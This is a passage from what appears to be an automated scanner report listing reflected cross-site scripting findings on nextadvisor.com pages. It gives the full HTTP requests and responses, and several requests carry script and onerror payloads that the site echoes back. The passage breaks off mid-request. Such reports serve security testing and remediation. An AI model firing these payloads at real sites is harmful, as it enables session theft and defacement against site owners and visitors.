Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=252293142.1303613812.1.1.utmgclid=CJa0kuyTtKgCFQTe4AodlRiOCw|utmccn=(not%20set)|utmcmd=(not%20set); __utma=252293142.2039271104.1303613812.1303613812.1303613812.1

Response (redirected)

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 20:05:42 GMT
Server: Apache/2.2.15 (Unix) mod_ssl/2.2.15 OpenSSL/0.9.7e PHP/5.3.2 mod_jk/1.2.21
X-Powered-By: PHP/5.3.2
Set-Cookie: PHPSESSID=9512ad1503b5ef485f94854525f889d1; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
P3P: CP="IDC DSP COR CURa ADMa OUR IND PHY ONL COM STA"
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 22527


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<meta http-equiv="Conten
...[SNIP]...
<link rel="canonical" href="http://www.nextadvisor.com/credit_report_monitoring/compare.phpd295c"><script>alert(1)</script>3b8f60613f2" />
...[SNIP]...

6.341. http://www.nextadvisor.com/credit_report_monitoring/compare.php [a parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.nextadvisor.com
Path:   /credit_report_monitoring/compare.php

Issue detail

The value of the a request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a552f"><a>51af3e8ef9f was submitted in the a parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /credit_report_monitoring/compare.php?h1=4&a=2a552f"><a>51af3e8ef9f&kw=gcrmb+credit%20monitoring%20service&gclid=CPK-2pL1tagCFUxo5QodMipJDQ HTTP/1.1
Host: www.nextadvisor.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=252293142.1303613812.1.1.utmgclid=CJa0kuyTtKgCFQTe4AodlRiOCw|utmccn=(not%20set)|utmcmd=(not%20set); __utma=252293142.2039271104.1303613812.1303613812.1303613812.1

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 19:57:25 GMT
Server: Apache/2.2.15 (Unix) mod_ssl/2.2.15 OpenSSL/0.9.7e PHP/5.3.2 mod_jk/1.2.21
X-Powered-By: PHP/5.3.2
Set-Cookie: PHPSESSID=f2981aef54e75ad2a69cc98e501d2fa4; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
P3P: CP="IDC DSP COR CURa ADMa OUR IND PHY ONL COM STA"
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 54443


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<meta http-equiv="Conten
...[SNIP]...
<a href="compare.php?h1=4&a=2a552f"><a>51af3e8ef9f&kw=gcrmb+credit%20monitoring%20service&gclid=CPK-2pL1tagCFUxo5QodMipJDQ" class='link_off'>
...[SNIP]...

6.342. http://www.nextadvisor.com/credit_report_monitoring/compare.php [gclid parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.nextadvisor.com
Path:   /credit_report_monitoring/compare.php

Issue detail

The value of the gclid request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a6072"><a>33ac73d2b1 was submitted in the gclid parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /credit_report_monitoring/compare.php?h1=4&a=2&kw=gcrmb+credit%20monitoring%20service&gclid=CPK-2pL1tagCFUxo5QodMipJDQa6072"><a>33ac73d2b1 HTTP/1.1
Host: www.nextadvisor.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=252293142.1303613812.1.1.utmgclid=CJa0kuyTtKgCFQTe4AodlRiOCw|utmccn=(not%20set)|utmcmd=(not%20set); __utma=252293142.2039271104.1303613812.1303613812.1303613812.1

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 19:59:29 GMT
Server: Apache/2.2.15 (Unix) mod_ssl/2.2.15 OpenSSL/0.9.7e PHP/5.3.2 mod_jk/1.2.21
X-Powered-By: PHP/5.3.2
Set-Cookie: PHPSESSID=24978dd6725c1f5a987b45f60146adcf; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
P3P: CP="IDC DSP COR CURa ADMa OUR IND PHY ONL COM STA"
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 54442


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<meta http-equiv="Conten
...[SNIP]...
<a href="compare.php?h1=4&a=2&kw=gcrmb+credit%20monitoring%20service&gclid=CPK-2pL1tagCFUxo5QodMipJDQa6072"><a>33ac73d2b1" class='link_off'>
...[SNIP]...

6.343. http://www.nextadvisor.com/credit_report_monitoring/compare.php [h1 parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.nextadvisor.com
Path:   /credit_report_monitoring/compare.php

Issue detail

The value of the h1 request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 30045"><a>c60b8b4e61a was submitted in the h1 parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /credit_report_monitoring/compare.php?h1=430045"><a>c60b8b4e61a&a=2&kw=gcrmb+credit%20monitoring%20service&gclid=CPK-2pL1tagCFUxo5QodMipJDQ HTTP/1.1
Host: www.nextadvisor.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=252293142.1303613812.1.1.utmgclid=CJa0kuyTtKgCFQTe4AodlRiOCw|utmccn=(not%20set)|utmcmd=(not%20set); __utma=252293142.2039271104.1303613812.1303613812.1303613812.1

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 19:56:03 GMT
Server: Apache/2.2.15 (Unix) mod_ssl/2.2.15 OpenSSL/0.9.7e PHP/5.3.2 mod_jk/1.2.21
X-Powered-By: PHP/5.3.2
Set-Cookie: PHPSESSID=0c142140445eafe8e5d590c55fefa1f3; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
P3P: CP="IDC DSP COR CURa ADMa OUR IND PHY ONL COM STA"
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 54218


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<meta http-equiv="Conten
...[SNIP]...
<a href="compare.php?h1=430045"><a>c60b8b4e61a&a=2&kw=gcrmb+credit%20monitoring%20service&gclid=CPK-2pL1tagCFUxo5QodMipJDQ" class='link_off'>
...[SNIP]...

6.344. http://www.nextadvisor.com/credit_report_monitoring/compare.php [kw parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nextadvisor.com
Path:   /credit_report_monitoring/compare.php

Issue detail

The value of the kw request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 788b7"><script>alert(1)</script>21be7ad5714 was submitted in the kw parameter. This input was echoed as 788b7\"><script>alert(1)</script>21be7ad5714 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /credit_report_monitoring/compare.php?h1=4&a=2&kw=gcrmb+credit%20monitoring%20service788b7"><script>alert(1)</script>21be7ad5714&gclid=CPK-2pL1tagCFUxo5QodMipJDQ HTTP/1.1
Host: www.nextadvisor.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=252293142.1303613812.1.1.utmgclid=CJa0kuyTtKgCFQTe4AodlRiOCw|utmccn=(not%20set)|utmcmd=(not%20set); __utma=252293142.2039271104.1303613812.1303613812.1303613812.1

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 19:58:48 GMT
Server: Apache/2.2.15 (Unix) mod_ssl/2.2.15 OpenSSL/0.9.7e PHP/5.3.2 mod_jk/1.2.21
X-Powered-By: PHP/5.3.2
Set-Cookie: PHPSESSID=b1ffc18fc62bf57a288591bfb20d7d6f; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
P3P: CP="IDC DSP COR CURa ADMa OUR IND PHY ONL COM STA"
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 55613


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<meta http-equiv="Conten
...[SNIP]...
<a href="/link.php?kw=gcrmb credit monitoring service788b7\"><script>alert(1)</script>21be7ad5714_ordering209&amp;category=creditreport&amp;link=idguard4&amp;id=11" target="_blank">
...[SNIP]...

6.345. http://www.nextadvisor.com/credit_report_monitoring/compare.php [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.nextadvisor.com
Path:   /credit_report_monitoring/compare.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a26f1"><a>a57fa5fe369 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /credit_report_monitoring/compare.php?h1=4&a=2&kw=gcrmb+credit%20monitoring%20service&gclid=CPK-2pL1tagCFUxo5QodMipJDQ&a26f1"><a>a57fa5fe369=1 HTTP/1.1
Host: www.nextadvisor.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=252293142.1303613812.1.1.utmgclid=CJa0kuyTtKgCFQTe4AodlRiOCw|utmccn=(not%20set)|utmcmd=(not%20set); __utma=252293142.2039271104.1303613812.1303613812.1303613812.1

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 20:02:05 GMT
Server: Apache/2.2.15 (Unix) mod_ssl/2.2.15 OpenSSL/0.9.7e PHP/5.3.2 mod_jk/1.2.21
X-Powered-By: PHP/5.3.2
Set-Cookie: PHPSESSID=57b822ef4f0edc7940575adb4df647e1; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
P3P: CP="IDC DSP COR CURa ADMa OUR IND PHY ONL COM STA"
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 54446


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<meta http-equiv="Conten
...[SNIP]...
<a href="compare.php?h1=4&a=2&kw=gcrmb+credit%20monitoring%20service&gclid=CPK-2pL1tagCFUxo5QodMipJDQ&a26f1"><a>a57fa5fe369=1" class='link_off'>
...[SNIP]...

6.346. http://www.nextadvisor.com/credit_report_monitoring/free_credit_score_review.php [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nextadvisor.com
Path:   /credit_report_monitoring/free_credit_score_review.php

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f82b0"><script>alert(1)</script>8fff9e9a35c was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /credit_report_monitoringf82b0"><script>alert(1)</script>8fff9e9a35c/free_credit_score_review.php HTTP/1.1
Host: www.nextadvisor.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=42bb280306117df0c9cb96a64969e55a; __utmz=252293142.1303674300.2.2.utmgclid=CPK-2pL1tagCFUxo5QodMipJDQ|utmccn=(not%20set)|utmcmd=(not%20set); __utma=252293142.2039271104.1303613812.1303613812.1303674300.2; __utmc=252293142

Response

HTTP/1.1 404 Not Found
Date: Sun, 24 Apr 2011 20:47:42 GMT
Server: Apache/2.2.15 (Unix) mod_ssl/2.2.15 OpenSSL/0.9.7e PHP/5.3.2 mod_jk/1.2.21
X-Powered-By: PHP/5.3.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
P3P: CP="IDC DSP COR CURa ADMa OUR IND PHY ONL COM STA"
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 11935


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<meta http-equiv="Conten
...[SNIP]...
<link rel="canonical" href="http://www.nextadvisor.com/credit_report_monitoringf82b0"><script>alert(1)</script>8fff9e9a35c/free_credit_score_review.php" />
...[SNIP]...

6.347. http://www.nextadvisor.com/credit_report_monitoring/free_credit_score_review.php [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nextadvisor.com
Path:   /credit_report_monitoring/free_credit_score_review.php

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 46999'><img%20src%3da%20onerror%3dalert(1)>c58afc0193b was submitted in the REST URL parameter 1. This input was echoed as 46999'><img src=a onerror=alert(1)>c58afc0193b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /credit_report_monitoring46999'><img%20src%3da%20onerror%3dalert(1)>c58afc0193b/free_credit_score_review.php HTTP/1.1
Host: www.nextadvisor.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=42bb280306117df0c9cb96a64969e55a; __utmz=252293142.1303674300.2.2.utmgclid=CPK-2pL1tagCFUxo5QodMipJDQ|utmccn=(not%20set)|utmcmd=(not%20set); __utma=252293142.2039271104.1303613812.1303613812.1303674300.2; __utmc=252293142

Response

HTTP/1.1 404 Not Found
Date: Sun, 24 Apr 2011 20:47:54 GMT
Server: Apache/2.2.15 (Unix) mod_ssl/2.2.15 OpenSSL/0.9.7e PHP/5.3.2 mod_jk/1.2.21
X-Powered-By: PHP/5.3.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
P3P: CP="IDC DSP COR CURa ADMa OUR IND PHY ONL COM STA"
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 11990


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<meta http-equiv="Conten
...[SNIP]...
<a href='/credit_report_monitoring46999'><img src=a onerror=alert(1)>c58afc0193b/index.php' class='nav_select'>
...[SNIP]...

6.348. http://www.nextadvisor.com/credit_report_monitoring/free_credit_score_review.php [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nextadvisor.com
Path:   /credit_report_monitoring/free_credit_score_review.php

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 52663"><script>alert(1)</script>05eb74dd5ce was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /credit_report_monitoring/52663"><script>alert(1)</script>05eb74dd5ce HTTP/1.1
Host: www.nextadvisor.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=42bb280306117df0c9cb96a64969e55a; __utmz=252293142.1303674300.2.2.utmgclid=CPK-2pL1tagCFUxo5QodMipJDQ|utmccn=(not%20set)|utmcmd=(not%20set); __utma=252293142.2039271104.1303613812.1303613812.1303674300.2; __utmc=252293142

Response (redirected)

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 20:48:18 GMT
Server: Apache/2.2.15 (Unix) mod_ssl/2.2.15 OpenSSL/0.9.7e PHP/5.3.2 mod_jk/1.2.21
X-Powered-By: PHP/5.3.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
P3P: CP="IDC DSP COR CURa ADMa OUR IND PHY ONL COM STA"
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 22445


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<meta http-equiv="Conten
...[SNIP]...
<link rel="canonical" href="http://www.nextadvisor.com/credit_report_monitoring/52663"><script>alert(1)</script>05eb74dd5ce.php" />
...[SNIP]...

6.349. http://www.nextadvisor.com/favicon.ico [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nextadvisor.com
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6492a"><script>alert(1)</script>31358a97f04 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /favicon.ico6492a"><script>alert(1)</script>31358a97f04 HTTP/1.1
Host: www.nextadvisor.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=ca43057bfb377bbe8c129dafe1c6ec28; __utmz=252293142.1303613812.1.1.utmgclid=CJa0kuyTtKgCFQTe4AodlRiOCw|utmccn=(not%20set)|utmcmd=(not%20set); __utma=252293142.2039271104.1303613812.1303613812.1303613812.1; __utmc=252293142; __utmb=252293142.1.10.1303613812

Response

HTTP/1.1 404 Not Found
Date: Sun, 24 Apr 2011 03:18:18 GMT
Server: Apache/2.2.15 (Unix) mod_ssl/2.2.15 OpenSSL/0.9.7e PHP/5.3.2 mod_jk/1.2.21
X-Powered-By: PHP/5.3.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
P3P: CP="IDC DSP COR CURa ADMa OUR IND PHY ONL COM STA"
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 11910


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<meta http-equiv="Conten
...[SNIP]...
<link rel="canonical" href="http://www.nextadvisor.com/favicon.ico6492a"><script>alert(1)</script>31358a97f04" />
...[SNIP]...

6.350. http://www.nextadvisor.com/images/blog_sidebar/internet_fax_sb.jpg [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nextadvisor.com
Path:   /images/blog_sidebar/internet_fax_sb.jpg

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4f416"><script>alert(1)</script>4731f60ad3c was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /images4f416"><script>alert(1)</script>4731f60ad3c/blog_sidebar/internet_fax_sb.jpg HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.nextadvisor.com

Response (redirected)

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 04:11:23 GMT
Server: Apache/2.2.15 (Unix) mod_ssl/2.2.15 OpenSSL/0.9.7e PHP/5.3.2 mod_jk/1.2.21
X-Powered-By: PHP/5.3.2
Set-Cookie: PHPSESSID=bb25406075fc65fe23fc9018b416cc04; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
P3P: CP="IDC DSP COR CURa ADMa OUR IND PHY ONL COM STA"
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 22389


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<meta http-equiv="Conten
...[SNIP]...
<link rel="canonical" href="http://www.nextadvisor.com/images4f416"><script>alert(1)</script>4731f60ad3c/blog_sidebar/internet_fax_sb.jpg.php" />
...[SNIP]...

6.351. http://www.nextadvisor.com/images/blog_sidebar/internet_fax_sb.jpg [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nextadvisor.com
Path:   /images/blog_sidebar/internet_fax_sb.jpg

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 8d1ab'><img%20src%3da%20onerror%3dalert(1)>b4f6c6a7ca7 was submitted in the REST URL parameter 2. This input was echoed as 8d1ab'><img src=a onerror=alert(1)>b4f6c6a7ca7 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /images/blog_sidebar8d1ab'><img%20src%3da%20onerror%3dalert(1)>b4f6c6a7ca7/internet_fax_sb.jpg HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.nextadvisor.com

Response (redirected)

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 04:13:02 GMT
Server: Apache/2.2.15 (Unix) mod_ssl/2.2.15 OpenSSL/0.9.7e PHP/5.3.2 mod_jk/1.2.21
X-Powered-By: PHP/5.3.2
Set-Cookie: PHPSESSID=80851d8767d529f822b1adcb94be86b8; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
P3P: CP="IDC DSP COR CURa ADMa OUR IND PHY ONL COM STA"
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 22594


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<meta http-equiv="Conten
...[SNIP]...
<a href='/blog_sidebar8d1ab'><img src=a onerror=alert(1)>b4f6c6a7ca7/index.php' class='nav_select'>
...[SNIP]...

6.352. http://www.nextadvisor.com/images/blog_sidebar/internet_fax_sb.jpg [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nextadvisor.com
Path:   /images/blog_sidebar/internet_fax_sb.jpg

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 89eaf"><script>alert(1)</script>c76e2d7db84 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /images/blog_sidebar89eaf"><script>alert(1)</script>c76e2d7db84/internet_fax_sb.jpg HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
